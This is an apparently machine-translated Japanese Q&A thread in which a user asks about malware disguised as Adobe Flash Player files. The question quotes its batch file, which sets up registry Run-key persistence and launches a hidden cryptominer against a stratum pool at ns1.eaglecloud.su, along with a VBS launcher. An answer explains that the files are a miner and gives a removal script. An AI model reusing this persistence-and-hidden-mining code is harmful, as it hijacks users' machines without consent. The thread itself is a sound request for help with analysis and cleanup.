-2

ある朝、システムの動作が非常に遅くなりました。タスク マネージャーは、インストールしていないにもかかわらず、インターネット ダウンロード マネージャーが実行されていることを示しました。「users/(my account)/appdata/roaming/adobe/flashplayer/purecache」にあることがわかりました。かなりのCPUを消費していました。

ネットで検索したところ、実行されていたのはおそらく何らかのマルウェア スクリプトであることがわかりました。朝、レジストリのエントリから起動するたびに、それは自動的に開始されました。システムにどれくらいの期間それがあったかわかりません。

それを開始したbatファイルは次のとおりです。

@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

Bat ファイルと同じフォルダーにある vbs スクリプト ファイルは次のとおりです。

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

その後、システムからすべてのエントリを削除しましたが、これがシステムにどれくらいの期間存在していたかわからないため、何が起こっているのか心配です。

これがある種のトロイの木馬であることはわかっています。しかし、誰かが私のためにバットとスクリプト ファイルを解釈し、これらが ns1.eaglecould.su に送信している情報を教えてください。

ありがとうございました

4

2 に答える 2

1

古いトピックを目覚めさせて申し訳ありませんが、同じ問題がありました。私には解決策があります。幸いなことに、これはトロイの木馬ではありません。

このマルウェアは、Adobe アップデータ ユーティリティを偽装します。ただし、アドビは常にプロダクション プログラムにデジタル署名します。ビットコインマイナーです。これは、インターネットとの通信に使用するstratum+tcpプロトコルを調べることでわかりました。これは、ビットコイン マイナーに関するページ一杯の結果を返しました。

バッチ ファイルが実際に行うことは、ログオン時にマイナーが自動的に開始されるように、レジストリに新しいエントリを作成することです。このマイナーは、あなたの国が紙幣を印刷するのと同じように、あなたの CPU パワーを使用して、オンライン通貨であるビットコインのハッシュをマイニングします。私が知る限り、それは個人的なファイルには触れません。

レジストリエントリと関連ファイルの両方を削除すると、それが殺されました。以下は、これらすべてを実行するバッチ スクリプトです。

@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause

それをバッチファイルに貼り付ければ、準備完了です。

于 2015-05-30T18:40:20.000 に答える